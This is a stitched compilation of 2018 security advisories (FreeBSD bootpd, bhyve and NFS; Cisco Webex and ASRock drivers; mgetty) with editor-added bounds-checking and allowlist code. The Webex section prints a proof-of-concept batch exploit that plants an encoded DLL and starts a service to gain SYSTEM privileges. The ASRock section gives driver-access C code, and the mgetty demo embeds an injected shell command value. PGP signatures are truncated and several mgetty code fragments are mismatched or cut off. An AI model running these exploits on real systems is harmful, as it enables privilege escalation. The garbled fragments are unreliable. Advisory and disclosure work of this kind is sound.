FreeBSD-SA-18:15.bootpd                                     Security Advisory
                                                          The FreeBSD Project

Topic:          bootpd buffer overflow

Category:       core
Module:         bootpd
Announced:      2018-12-19
Credits:        Reno Robert
Affects:        All supported versions of FreeBSD.
Corrected:      2018-12-19 18:17:59 UTC (stable/12, 12.0-STABLE)
                2018-12-19 18:21:07 UTC (releng/12.0, 12.0-RELEASE-p1)
                2018-12-19 18:19:15 UTC (stable/11, 11.2-STABLE)
                2018-12-19 18:22:25 UTC (releng/11.2, 11.2-RELEASE-p7)
CVE Name:       CVE-2018-17161

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The bootpd utility implements an Internet Bootstrap Protocol (BOOTP)
server as defined in RFC951, RFC1532, and RFC1533.

II.  Problem Description

Due to insufficient validation of network-provided data it may be
possible for a malicious attacker to craft a bootp packet which could
cause a stack buffer overflow.

III. Impact

It is possible that the buffer overflow could lead to a Denial of
Service or remote code execution.

IV.  Workaround

Firewall rules may be used to limit reception of bootp packets to only
trusted networks or hosts.  Note that the bootp protocol is typically
limited to a common layer 2 broadcast domain, although the bootpgw
gateway can forward bootp requests and responses between subnets.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
Restart bootpd if it is running in standalone mode.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:15/bootpd.patch
# fetch https://security.FreeBSD.org/patches/SA-18:15/bootpd.patch.asc
# gpg --verify bootpd.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the applicable daemons, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r342228
releng/12.0/                                                      r342230
stable/11/                                                        r342229
releng/11.2/                                                      r342231
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17161>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-18:15.bootpd.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlwane5fFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cKfzg/+PhmA1AKfXFSkeJJPvdF/7hjKpWaCdVAyUZsuWH5L1Tmb4Lc/pLjw22Ba
Xh/sAKik6pa/nVTZCBgAqoCqmV8CdhScwvRZdVSP5CQ9vnM+6fFcybP0aCZOmiJC
NGAE8nIBdazqWJfNM9HUSIbdqEOtMlVcyE0Ni/TxzcAFdzFowfDnyRm1wqI4zhM7
YL7pU0kTYJfydjK540rHB1tNBaYHSJ/6ckK3tkjwjVgMsQwNSizKrPsqycoMlMmD
TqQMfDwU8W/jFLsr7OZE66eQBysSiuzYAv3IsipL+50SYgS0aoo3LwKrCcYGN6c/
S/0SOfNHDgd/7wregI5adKqWJceaqZCVedSVLm6ZaG1Vt3alIjczX9D7wIjuXPlD
AkSKa0HnmSwDC8yWLJYMxuny7vy3uBAUnPiwIT3RrsDC0b28/uwNPbeSbG0Wrf9F
21PDMfeCPc2Vr/TVj9uSIo20pNtVhy+tGbx1Ilsgi3POa3n7pTOuFWHMzQVe3rZA
DLYEbliPxpq9NFJ/2UZQg25weOD5ygwaYZnbsXAMY47D4kteeQOjzomgiacVhE56
oT8z804nGgGdCe4LpiHihDVzCbBvvuEPw9Edffzm7EWykp
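The advisory does not name the field whose validation was missing, so what follows is not a reconstruction of the bug. It is an added example by the editor of the checks a BOOTP receiver has to make before trusting a packet's own length fields: the RFC 951 fixed header, the 16-byte limit on `hlen`, and the tag/length/value options of RFC 1533 that must not be allowed to run past the vendor area. The request builder and the sample packets are constructed for the demonstration.

```python
"""A bounds-checked parser for BOOTP requests (RFC 951 fixed header and
RFC 1533 vendor options), the validation a daemon must do before copying
anything out of a network-supplied packet."""
import struct

BOOTP_HEADER = struct.Struct("!BBBBIHH4s4s4s4s16s64s128s")   # 236 bytes
MAGIC_COOKIE = bytes([99, 130, 83, 99])                        # RFC 1533
BOOTREQUEST = 1
MAX_HLEN = 16            # chaddr is a 16-byte field; hlen may not exceed it
OPTION_PAD, OPTION_END = 0, 255


def parse_options(vend: bytes) -> dict:
    """Parse tag/length/value options. Every length is checked against the
    buffer before the value is sliced, so a lying length byte cannot make
    us read (or, in C, copy) past the end of the vendor area."""
    if vend[:4] != MAGIC_COOKIE:
        return {}            # RFC 951 vendor-specific data: leave it opaque
    opts, i = {}, 4
    while i < len(vend):
        tag = vend[i]
        if tag == OPTION_PAD:
            i += 1
            continue
        if tag == OPTION_END:
            break
        if i + 1 >= len(vend):
            raise ValueError("option %d has no length byte" % tag)
        length = vend[i + 1]
        start, end = i + 2, i + 2 + length
        if end > len(vend):
            raise ValueError("option %d runs %d bytes past the buffer"
                             % (tag, end - len(vend)))
        opts[tag] = vend[start:end]
        i = end
    return opts


def parse_bootp(packet: bytes) -> dict:
    """Decode a BOOTP packet, rejecting anything whose own length fields
    disagree with the bytes actually present."""
    if len(packet) < BOOTP_HEADER.size:
        raise ValueError("short packet: %d bytes" % len(packet))
    (op, htype, hlen, hops, xid, secs, flags, ciaddr, yiaddr, siaddr,
     giaddr, chaddr, sname, file_) = BOOTP_HEADER.unpack_from(packet)
    if hlen > MAX_HLEN:
        # A server that trusts hlen when copying chaddr into a fixed-size
        # buffer overruns it; refuse instead.
        raise ValueError("hlen %d exceeds chaddr size %d" % (hlen, MAX_HLEN))
    return {
        "op": op, "htype": htype, "hlen": hlen, "xid": xid, "flags": flags,
        "ciaddr": ciaddr, "giaddr": giaddr,
        "chaddr": chaddr[:hlen],
        "sname": sname.split(b"\0", 1)[0],     # NUL-terminated in RFC 951
        "file": file_.split(b"\0", 1)[0],
        "options": parse_options(packet[BOOTP_HEADER.size:]),
    }


def is_well_formed(packet: bytes) -> bool:
    """Verdict form of parse_bootp for filters that only need accept/reject."""
    try:
        parse_bootp(packet)
        return True
    except ValueError:
        return False


def build_request(xid: int, mac: bytes, options: bytes = b"") -> bytes:
    """Constructed BOOTREQUEST (Ethernet htype=1) with a 64-byte vendor area."""
    header = BOOTP_HEADER.pack(BOOTREQUEST, 1, len(mac), 0, xid, 0, 0,
                               b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,
                               mac.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)
    vend = (MAGIC_COOKIE + options + bytes([OPTION_END])).ljust(64, b"\0")
    return header + vend


if __name__ == "__main__":
    mac = bytes.fromhex("001122334455")
    good = build_request(0x1234, mac, b"\x0c\x04host")        # option 12: host name
    print("good:", parse_bootp(good)["options"])
    overrun = build_request(0x1234, mac, b"\x0c\x50host")     # claims 80 bytes
    bad_hlen = good[:2] + b"\x20" + good[3:]                  # hlen = 32
    print("overrun well-formed:", is_well_formed(overrun))
    print("bad hlen well-formed:", is_well_formed(bad_hlen))
```

The two rejected packets are the shapes an overflow in this protocol usually takes: a header count larger than the field it indexes, and an option length larger than the bytes that follow it. Both are cheap to check and both must be checked before any copy.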
FreeBSD Security Advisory FreeBSD-SA-18:14.bhyve
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-18:14.bhyve                                      Security Advisory
                                                          The FreeBSD Project

Topic:          Insufficient bounds checking in bhyve(8) device model

Category:       core
Module:         bhyve
Announced:      2018-12-04
Credits:        Reno Robert
Affects:        All supported versions of FreeBSD.
Corrected:      2018-12-04 18:32:50 UTC (stable/11, 11.2-STABLE)
                2018-12-04 18:38:32 UTC (releng/11.2, 11.2-RELEASE-p6)
CVE Name:       CVE-2018-17160

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The bhyve hypervisor uses the bhyve(8) program to emulate support for
most virtual devices used by guest operating systems.

II.  Problem Description

Insufficient bounds checking in one of the device models provided by
bhyve(8) can permit a guest operating system to overwrite memory in the
bhyve(8) process, possibly permitting arbitrary code execution.

III. Impact

A guest OS using a firmware image can cause the bhyve process to crash,
or possibly execute arbitrary code on the host as root.

IV.  Workaround

The device model in question is only enabled when booting guests with a
firmware image such as the UEFI images from the bhyve-firmware package.
Guests booted using bhyveload(8) or grub2-bhyve are not affected.
Guests using operating systems supported by bhyveload(8) or grub2-bhyve
can be booted using these tools as a workaround.  No workaround is
available for guest operating systems such as Windows that require a
firmware image.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, restart guests using firmware images.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:14/bhyve.patch
# fetch https://security.FreeBSD.org/patches/SA-18:14/bhyve.patch.asc
# gpg --verify bhyve.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

Afterward, restart guests using firmware images.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/11/                                                        r341486
releng/11.2/                                                      r341488
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17160>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-18:14.bhyve.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlwGykdfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cKcIQ/+Ktt7+SZPoWZQmJv6LdT6qI+na0+/9LDwBoC+Tj37heFUnhcMTxDDH4o3
nexELxF1xHmRchooRKfJr7npa8CF4jBzp2PSb+783q6TrFKe90ohlmt56lRB6gJg
3IJX5TxvAvLsqTgwPyALqyy3H5C8cY3btHPsZIArK0WVRTB74K3mr3L3IRVTcMCv
9cbUZyDO21ZIDTB5h9FYGo+6bg8hvZztmromkxssqlKKS8TUltGr/H3k6EHlnEA9
rG+6kswIgyeXNFrdksD6ni7L5Z3lwR/DFiU2d/lageQZ6vgDUa3c0KMhepfelfJR
AiUtGpgfCDuHZ1NV2uyr9I6nPRHhdxPy3o2bF/B7+SLdn03tcZiO0tx3Wf68EQlt
jAYFuup7+TFKoupsHlb2fkQxNOeQCr6dF+ikJDVgwCqmx2zn9tDo/tWoNdH+Jylx
MDKsE369HOSRGR3Ua1ELEtOEzbGbcUHJyT6I1E2poctE61hYI+5te6pasY3ReN68
vyFMAo5ey0kJ6mi2YVcvDo2ZEb/GP1noJkdquYpIm8Ko0TPtivaMHXLIPcpLiJUc
fBZexGCXJnb8f6ClMMU12U6f3H35Hz1AUPG3MSWHGgoczQBZJ8PEC
FreeBSD Security Advisory FreeBSD-SA-18:13.nfs
=============================================================================
FreeBSD-SA-18:13.nfs                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Multiple vulnerabilities in NFS server code

Category:       core
Module:         nfs
Announced:      2018-11-27
Credits:        Jakub Jirasek, Secunia Research at Flexera
Affects:        All supported versions of FreeBSD.
Corrected:      2018-11-23 20:41:54 UTC (stable/11, 11.2-STABLE)
                2018-11-27 19:42:16 UTC (releng/11.2, 11.2-RELEASE-p5)
CVE Name:       CVE-2018-17157, CVE-2018-17158, CVE-2018-17159

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/.

I.   Background

The Network File System (NFS) allows a host to export some or all of its
file systems so that other hosts can access them over the network and
mount them as if they were local. FreeBSD includes both server and client
implementations of NFS.

II.  Problem Description

Insufficient and improper checking in the NFS server code could cause a
denial of service or possibly remote code execution via a specially
crafted network packet.

III. Impact

A remote attacker could cause the NFS server to crash, resulting in a
denial of service, or possibly execute arbitrary code on the server.

IV.  Workaround

No workaround is available, but systems that do not provide NFS services
are not vulnerable.

Additionally, it is highly recommended that the NFS service port (default
port number 2049) be protected by a host or network based firewall to
prevent arbitrary, untrusted clients from being able to connect.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-18:13/nfs.patch
# fetch https://security.FreeBSD.org/patches/SA-18:13/nfs.patch.asc
# gpg --verify nfs.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/11/                                                        r340854
releng/11.2/                                                      r341088
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://www.flexerasoftware.com/enterprise/company/about/secunia-research/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17158
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17159

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-18:13.nfs.asc
[CORE-2018-0011] - Cisco WebEx Meetings Elevation of Privilege Vulnerability
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Cisco WebEx Meetings Elevation of Privilege Vulnerability

1. *Advisory Information*

Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability
Advisory ID: CORE-2018-0011
Advisory URL: http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability
Date published: 2018-11-27
Date of last update: 2018-11-27
Vendors contacted: Cisco
Release mode: Coordinated release

2. *Vulnerability Information*

Class: OS command injection [CWE-78]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-15442

3. *Vulnerability Description*

Cisco's Webex Meetings website states that [1]:

   Cisco Webex Meetings: Simply the Best Video Conferencing and Online
   Meetings. With Cisco Webex Meetings, joining is a breeze, audio and
   video are clear, and screen sharing is easier than ever. We help you
   forget about the technology, to focus on what matters.

A vulnerability in the update service of Cisco Webex Meetings Desktop App
for Windows could allow a local attacker to elevate privileges. This
vulnerability is related to a previous security issue fixed by Cisco in
October.

4. *Vulnerable Packages*

. Cisco Webex Meetings Desktop App releases prior to 33.6.4
. Cisco Webex Productivity Tools releases 32.6.0 and later prior to 33.0.6

5. *Vendor Information, Solutions and Workarounds*

Cisco released a new fixed version and updated its security notice:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181024-webex-injection

6. *Credits*

This vulnerability was discovered and researched by Marcos Accossatto from
SecureAuth Exploits' Writers Team. The publication of this advisory was
coordinated by Leandro Cuozzo from SecureAuth Advisories Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Privilege Escalation* [CVE-2018-15442]

The update service of Cisco Webex Meetings Desktop App for Windows does not
properly validate user-supplied parameters. An unprivileged local attacker
could exploit this vulnerability by invoking the update service command
with a crafted argument. This allows the attacker to run arbitrary commands
with SYSTEM user privileges.

The vulnerability can be exploited by copying the ptUpdate.exe binary to a
local attacker-controlled folder. A malicious DLL named wbxtrace.dll must
also be placed in the same folder. To gain privileges, the attacker then
starts the service with the command line:

   sc start webexservice install software-update 1 "attacker-controlled-path"

(if the parameter 1 doesn't work, then 2 should be used)

Proof of Concept:

/-----
REM Contents of PoC.bat
REM This batch will copy the ptUpdate.exe from the installation folder to the current folder
REM Then it will generate a simple dll that will execute notepad.exe on load. The dll will be created using certutil.exe and named wbxtrace.dll
REM Finally, the webexservice service will be started, with the shown parameters
REM The result should be a notepad.exe with SYSTEM user privileges
@echo off
:CheckOS
IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)
:64BIT
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\ptUpdate.exe" .
GOTO END
:32BIT
copy "%PROGRAMFILES%\Webex\Webex\Applications\ptUpdate.exe" .
GOTO END
:END
echo TVqQAAME//8AALgAQAAAsA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJACVyJXZ0an7itGp+4rRqfuKLYnpitOp+4pftuiK1Kn7ilJpY2jRqfuKAABQRQAATAEEALCa5 > dll.txt
echo VsAAOAADiELAQUMAAIGABAQIAAAEAAQAgAABAQEAABQBAAA3GEAAAIAABAAABAAEAAAEBBgIAAANQggAAAoAEwAAA >> dll.txt
echo AAIAAACC50ZXh0nQAQAgQAACAAAGAucmRhdGEAAJUAIAIGAABAAABALmRhdGEQADACCAAAQAAAwC5yZWxvYwAAGAB >> dll.txt
echo AAgoAAEAAAEIA >> dll.txt
echo A >> dll.txt
echo FWL7IPErIN9DAF1NGoAakSNRbxQ6DcAAADHRbxEjUWsUI1FvFBqAGoAagBqAGoAagBoADAAEGoA
[CORE-2018-0005] - ASRock Drivers Elevation of Privilege Vulnerabilities
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

ASRock Drivers Elevation of Privilege Vulnerabilities

1. *Advisory Information*

Title: ASRock Drivers Elevation of Privilege Vulnerabilities
Advisory ID: CORE-2018-0005
Advisory URL: https://www.secureauth.com/labs/advisories/asrock-drivers-elevation-privilege-vulnerabilities
Date published: 2018-10-25
Date of last update: 2018-10-25
Vendors contacted: ASRock
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-10709, CVE-2018-10710, CVE-2018-10711, CVE-2018-10712

3. *Vulnerability Description*

ASRock's website states that [1]:

   ASRock Inc. is established in 2002, specialized in the field of
   motherboards. With the 3C design concept, Creativity, Consideration,
   Cost-effectiveness, the company explores the limit of motherboards
   manufacturing while paying attention on the eco issue at the same time,
   developing products with the consideration of eco-friendly concept.
   ASRock has been growing fast and become world third largest motherboard
   brand with headquarter in Taipei, Taiwan and branches in Europe and the
   USA.

ASRock offers several utilities designed to give the user of an ASRock
motherboard more control over certain settings and functions. These
utilities include features like RGB LED control, hardware monitoring, fan
control, and overclocking/voltage options.

Multiple vulnerabilities were found in the AsrDrv101.sys and AsrDrv102.sys
low level drivers, installed by ASRock RGBLED and other ASRock branded
utilities, which could allow a local attacker to elevate privileges.

4. *Vulnerable Packages*

. ASRock RGBLED before v1.0.35.1
. A-Tuning before v3.0.210
. F-Stream before v3.0.210
. RestartToUEFI before v1.0.6.2

5. *Vendor Information, Solutions and Workarounds*

ASRock published the following fixed applications for each of its
motherboard models:

. ASRock RGBLED v1.0.36
. A-Tuning v3.0.216
. F-Stream v3.0.216
. RestartToUEFI v1.0.7

Downloads are available on the ASRock website.

6. *Credits*

These vulnerabilities were discovered and researched by Diego Juarez. The
publication of this advisory was coordinated by Leandro Cuozzo from
SecureAuth Advisories Team.

7. *Technical Description / Proof of Concept Code*

ASRock's RGBLED, A-Tuning, F-Stream, RestartToUEFI, and possibly others,
use a low level driver to program and query the status of embedded ICs on
their hardware. Fan curves, clock frequencies, LED colors, thermal
performance, and other user customizable properties and monitoring
functionality are exposed to applications through this low level kernel
driver.

The main subjects of this advisory are the device drivers installed/loaded
by these utilities (AsrDrv101.sys and AsrDrv102.sys), from now on addressed
as "AsrDrv".

The default installation allows non-privileged user processes (even those
running at LOW integrity) to get a HANDLE and issue IOCTL codes to the
driver. The following sections describe the problems found.

7.1. *CR register access* [CVE-2018-10709]

AsrDrv exposes functionality to read and write CR register values. This
could be leveraged in a number of ways to ultimately run code with elevated
privileges.
/-----
// Asrock RGBLED PoC demonstrating non-privileged access to CR registers
#include <windows.h>
#include <stdio.h>

#define IOCTL_ASROCK_READCR  0x22286C
#define IOCTL_ASROCK_WRITECR 0x222870

HANDLE ghDriver = 0;

#pragma pack(push, 1)
typedef struct _ASROCK_CR_STRUCT {
    ULONG64 reg;
    ULONG64 value;
} ASROCK_CR_STRUCT;
#pragma pack(pop)

// Sends the caller's `inbuffer` to the driver and returns the second qword
// of the reply, which carries the register value.
#define IOCTLMACRO(iocontrolcode, size) \
    ULONG64 outbuffer[2] = { 0 }; \
    DWORD returned = 0; \
    DeviceIoControl(ghDriver, iocontrolcode, (LPVOID)&inbuffer, size, \
                    (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
    return outbuffer[1];

ULONG64 ASROCK_ReadCR(DWORD reg)
{
    ASROCK_CR_STRUCT inbuffer = { reg, 0 };
    IOCTLMACRO(IOCTL_ASROCK_READCR, 10)
}

ULONG64 ASROCK_WriteCR(DWORD reg, ULONG64 value)
{
    ASROCK_CR_STRUCT inbuffer = { reg, value };
    IOCTLMACRO(IOCTL_ASROCK_WRITECR, 10)
}

BOOL InitDriver()
{
    // Any user process, even one at LOW integrity, can open this device.
    char szDeviceName[] = "\\\\.\\AsrDrv101";
    ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE,
                          FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
                          FILE_ATTRIBUTE_NORMAL, NULL);
    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n",
               szDeviceName, GetLastError());
        return FALSE;
    }
    return TRUE;
}

int main(int argc, char* argv[])
{
    printf("Asrock RGBLED PoC (CR access) - pnx!/CORE\n");
    if (!InitDriver()) {
        return 1;
    }
    // Read CR0 through the exposed IOCTL; the remainder of the original
    // proof of concept is not reproduced in this copy.
    printf("CR0 = 0x%016llx\n", ASROCK_ReadCR(0));
    CloseHandle(ghDriver);
    return 0;
}
-----/
X41 D-Sec GmbH Security Advisory X41-2018-007: Multiple Vulnerabilities in mgetty
X41 D-Sec GmbH Security Advisory: X41-2018-007

Multiple Vulnerabilities in mgetty
==================================

Overview
--------
Confirmed Affected Versions: 1.2.0
Patched Versions: 1.2.1
Vendor: mgetty
Vendor URL: http://mgetty.greenie.net
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-007-mgetty

Summary and Impact
------------------
Multiple issues have been identified in the mgetty fax software. These might
be used by local users to elevate their privileges.

X41 did not perform a full test or audit on the software.

Product Description
-------------------
From the vendor:

    For those of you that do not know mgetty+sendfax yet: it's a reliable
    and proven fax send and receive solution for unix and Linux. But it can
    do much more... so read the docs and be surprised.

Shell injection via faxq-helper
===============================
Severity Rating: Medium
Vector: Fax Job
CVE: CVE-2018-16741
CWE: 78
CVSS Score: 6.1
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

In fax/faxq-helper.c function do_activate(), not all characters are properly
sanitized to prevent command injection. It is possible to use ||, && or > to
change the control flow.

{% highlight c %}
/* replace all quote characters, backslash and ';' by '_' */
for( q = buf; *q != '\0'; q++ )
{
    if ( *q == '\'' || *q == '"' || *q == '`' || *q == '\\' || *q == ';' )
    {
        *q = '_';
    }
}
{% endhighlight %}

A job file containing malicious input can be constructed using
"faxq-helper activate". Once faxrunq is started, the code is executed as the
user running the command.

{% highlight bash %}
# " '\$ ;
command=tr -d '\042\047\140\134\044\073'
{% endhighlight %}

{% highlight c %}
(pwd ? 0 : 1)) badlogin(tbuf);
failures = 0;
}
(void)strcpy(tbuf, username);
{% endhighlight %}

Stack Based Buffer Overflow With Long Argument in contrib/scrts.c
=================================================================
Severity Rating: Low
Vector: Command Line Parameter
CVE: CVE-2018-16742
CWE: 121
CVSS Score: 2.9
CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

In file contrib/scrts.c a stack buffer overflow can be triggered via a
command line parameter.

{% highlight c %}
int main( int argc, char ** argv )
{
    int i, fd;
    struct termios tio;
    char device[1000];

    for ( i=1; i
{% endhighlight %}

{% highlight c %}
>/dev/null 2>&1", MAILER, mailto );
pipefp = popen( buf, "w" );
{% endhighlight %}

Endless loop in g3/g32pbm.c
===========================
When converting g32 files using g3/g32pbm.c, an endless loop can be triggered
by a malformed input file. An example can be found at
files/g32pmbinfiniteloop.

Out Of Bounds Access in g3/pbm2g3.c
===================================
When converting pbm files using g3/pbm2g3.c, out of bounds accesses can occur
with malformed input files in putwhitespan(). An example can be found with
files/pbm2g2oobaccess.

{% highlight c %}
putcode( twhite[l].bitcode, twhite[l].bitlength );
{% endhighlight %}

Workaround
----------
None.

Timeline
--------
2018-06-07 Issues found
2018-08-27 Issue reported to vendor
2018-08-28 Vendor reply
2018-09-08 Vendor sends patches
2018-09-08 CVE IDs requested
2018-09-09 CVE IDs assigned
2018-09-11 Patched Version released
2018-09-11 Advisory released

About X41 D-SEC GmbH
--------------------
X41 is an expert provider for application security services. Having
extensive industry experience and expertise in the area of information
security, a strong core security team of world class security experts
enables X41 to perform premium security services.

Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery. Custom research and IT security consulting and support services
are core competencies of X41.

--
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Registered office: Aachen, Aachen local court: HRB19989
Managing director: Markus Vervier
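The faxq-helper filter quoted above replaces quotes, backslashes and semicolons but leaves every other shell control character in place. The following C program is an added example, not mgetty code: it reproduces that loop, shows that an injected `|| ...` survives it untouched, and contrasts it with an allowlist that admits only the characters a job identifier legitimately needs. The helper names and the sample job value are constructed for the example.

```c
/* Added example (not mgetty code): the blacklist filter from faxq-helper.c
 * beside an allowlist check. Shows why the former does not stop the shell
 * operators "||", "&&" and ">" named in the advisory. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Same logic as the do_activate() loop: only quotes, backslash and ';'
 * are replaced by '_'; everything else passes through to the shell. */
void sanitize_blacklist(char *buf)
{
    char *q;
    for (q = buf; *q != '\0'; q++) {
        if (*q == '\'' || *q == '"' || *q == '`' || *q == '\\' || *q == ';')
            *q = '_';
    }
}

/* Copy `in` into a private buffer, run the blacklist filter, return result. */
const char *blacklist_result(const char *in)
{
    static char buf[256];
    snprintf(buf, sizeof buf, "%s", in);
    sanitize_blacklist(buf);
    return buf;
}

/* Does the string still contain characters the shell treats specially? */
int has_shell_metachars(const char *s)
{
    return strpbrk(s, "|&<>$;`'\"\\*?()[]{}~\n") != NULL;
}

/* Allowlist: letters, digits, '.', '-' and '_' only; never empty, and never
 * starting with '-' so the value cannot be parsed as a command option. */
int is_allowlisted(const char *s)
{
    if (*s == '\0' || *s == '-')
        return 0;
    for (; *s != '\0'; s++) {
        unsigned char c = (unsigned char)*s;
        if (!(isalnum(c) || c == '.' || c == '-' || c == '_'))
            return 0;
    }
    return 1;
}

int main(void)
{
    /* Constructed job-file value carrying an injected command. */
    const char *job = "JOB001 || touch /tmp/pwned";
    const char *filtered = blacklist_result(job);
    printf("after blacklist: \"%s\" (shell metachars left: %d)\n",
           filtered, has_shell_metachars(filtered));
    printf("allowlist accepts \"JOB001.g3\": %d\n", is_allowlisted("JOB001.g3"));
    printf("allowlist accepts injected value: %d\n", is_allowlisted(job));
    return 0;
}
```

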